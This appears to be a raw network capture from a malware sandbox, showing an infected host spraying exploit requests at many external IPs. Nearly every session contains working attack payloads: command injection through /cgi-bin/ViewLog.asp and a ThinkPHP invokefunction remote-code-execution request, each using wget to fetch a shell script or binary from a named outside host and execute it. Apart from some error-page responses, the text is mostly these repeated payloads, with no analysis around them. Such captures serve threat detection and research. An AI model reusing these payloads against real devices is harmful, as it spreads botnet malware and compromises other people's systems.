2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 33 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="ru"><head><title>HTTP Status 404 </title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 </h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/cgi-bin/ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.35</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
948	192.168.2.15	33478	95.86.118.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.086307049 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
949	192.168.2.15	57414	94.121.124.144	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.093774080 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
950	192.168.2.15	55436	94.120.227.253	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.094202042 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
951	192.168.2.15	60310	95.0.88.168	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.100842953 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:46.333667994 CET	165	IN	HTTP/1.1 307 Temporary Redirect Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://185.196.9.5:80/cgi-bin/ViewLog.asp Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
952	192.168.2.15	33698	112.179.155.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.615515947 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:46.919661045 CET	35	IN	HTTP/1.0 301 Redirect
Feb 25, 2024 19:04:46.919718027 CET	399	IN	Data Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 4d 6f 6e 20 46 65 62 20 32 36 20 30 33 3a 30 34 3a 34 36 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 Data Ascii: Server: GoAhead-WebsDate: Mon Feb 26 03:04:46 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to

Session ID	Source IP	Source Port	Destination IP	Destination Port
953	192.168.2.15	36362	112.220.118.162	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.618542910 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:48.165200949 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:50.021229029 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:53.733071089 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:01.157016993 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:16.004913092 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:45.956510067 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
954	192.168.2.15	51150	31.136.58.245	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.628113031 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:49.637164116 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:55.781059980 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:07.812923908 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:33.668669939 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
955	192.168.2.15	47196	31.136.72.122	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.628201008 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:49.637157917 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:55.781071901 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:07.812926054 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:33.668659925 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
956	192.168.2.15	47762	95.91.162.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.630954981 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:46.848603010 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Sun, 25 Feb 2024 18:04:46 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
957	192.168.2.15	42918	94.121.117.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.657325029 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
958	192.168.2.15	58440	94.123.55.212	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.663079977 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
959	192.168.2.15	37714	112.163.193.77	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.910021067 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
960	192.168.2.15	33702	112.179.155.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.910067081 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:47.211471081 CET	35	IN	HTTP/1.0 301 Redirect
Feb 25, 2024 19:04:47.211510897 CET	399	IN	Data Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 4d 6f 6e 20 46 65 62 20 32 36 20 30 33 3a 30 34 3a 34 36 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 Data Ascii: Server: GoAhead-WebsDate: Mon Feb 26 03:04:46 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to

Session ID	Source IP	Source Port	Destination IP	Destination Port
961	192.168.2.15	55574	94.72.112.163	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:46.932002068 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:47.051527023 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:46 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 